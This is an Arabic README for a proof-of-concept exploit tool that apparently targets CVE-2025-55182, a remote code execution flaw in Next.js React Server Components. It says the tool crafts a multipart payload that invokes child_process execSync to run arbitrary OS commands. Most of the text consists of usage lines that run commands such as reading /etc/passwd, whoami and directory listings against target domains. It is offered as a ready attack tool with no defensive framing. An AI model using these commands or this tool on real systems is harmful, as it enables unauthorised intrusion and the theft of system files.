
POC-CVE-2025-55182
أداة استغلال متكاملة الميزات لثغرة CVE-2025-55182 — تنفيذ التعليمات البرمجية عن بُعد عبر مكوّنات خادم React في Next.js. يقوم الماسح تلقائيًا بصياغة حمولة multipart ويستغل process.mainModule.require('child_process').execSync() لتحقيق تنفيذ أوامر نظام تشغيل عشوائية على الأنظمة المعرّضة للثغرة.
الميزات
التثبيت
chmod +x scanner.sh
الاستخدام
./scanner.sh -d vulnerable-app.com
./scanner.sh -d vulnerable-app.com -c "whoami"
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
الخيارات
أمثلة
./scanner.sh -d shop.example.com
./scanner.sh -d shop.example.com -c "uname -a"
./scanner.sh -d shop.example.com -c "ls -la /var/www"
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
لا تتردد في التواصل عبر mailto:[email protected]